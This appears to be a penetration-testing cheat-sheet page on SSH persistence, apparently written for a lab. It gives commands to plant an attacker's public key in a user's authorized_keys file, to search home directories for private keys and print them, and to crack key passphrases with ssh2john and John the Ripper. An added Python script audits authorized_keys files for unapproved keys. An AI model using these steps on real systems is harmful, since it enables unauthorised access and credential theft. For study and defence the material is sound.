Persistence
SSH
Key Injection
Generate SSH Keys
ssh-keygen -t ed25519 -f key
For ssh to accept the private key, give it restricted permissions:
chmod 600 key
If the authorized_keys file doesn't exist, create one with your public key:
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys
Otherwise, append your public key:
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys
Now just connect with your private key:
ssh -i key dvir@10.10.11.8
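Seen from the defender's side, the authorized_keys change described above can be caught by comparing the fingerprint of every entry against an approved list. This is an added example, not part of the original notes; the function names, the approved set and the sample file (built from a constructed all-zero key plus the public key line shown above) are assumptions made for illustration.

```python
import base64
import hashlib

def fingerprint(blob_b64):
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def embedded_type(blob_b64):
    """Key type name stored at the start of the blob, or None if it is malformed."""
    try:
        wire = base64.b64decode(blob_b64, validate=True)
        length = int.from_bytes(wire[:4], "big")
        return wire[4:4 + length].decode("ascii")
    except ValueError:
        return None

def parse_entry(line):
    """Return (options, keytype, blob, comment), or None if the line holds no key."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return None
    # Options may precede the key type and may contain quoted spaces, so find
    # the first field whose following blob embeds that same type name.
    for i in range(len(fields) - 1):
        if embedded_type(fields[i + 1]) == fields[i]:
            return " ".join(fields[:i]), fields[i], fields[i + 1], " ".join(fields[i + 2:])
    return None

def audit(text, approved):
    """List (line_no, fingerprint, comment, options) for keys not in `approved`."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry and fingerprint(entry[2]) not in approved:
            findings.append((no, fingerprint(entry[2]), entry[3], entry[0]))
    return findings

# Constructed sample file: an approved key (all-zero key material, with an
# options field) followed by the public key line shown on this page.
APPROVED_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAI" + "A" * 43
SAMPLE = (
    "# constructed authorized_keys\n"
    f'command="echo hi there" ssh-ed25519 {APPROVED_BLOB} deploy@ci\n'
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c\n"
)
APPROVED = {fingerprint(APPROVED_BLOB)}

if __name__ == "__main__":
    print(*audit(SAMPLE, APPROVED), sep="\n")
```

Run against each user's real authorized_keys file, any finding is a key nobody approved; entries that carry an options field are worth reviewing even when the key itself is on the list.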
Using Existing keys
Look for the private key
find /home/user -name "id_*" -exec cat {} \;
Once you find it, just copy the key into your .ssh directory and ssh in. You can also check whether the corresponding private/public key is known by using this repo.
Crack the passphrase
Use ssh2john to generate a hash from the key:
ssh2john private_key > private_key.hash
Then feed this hash into John the Ripper:
john private_key.hash --wordlist=/path/to/wordlist
Clone the key
Sometimes you may need to write out a decrypted copy of an encrypted key:
openssl rsa -in spanishdancer.key -out ~/keys/ariekei-spanishdancer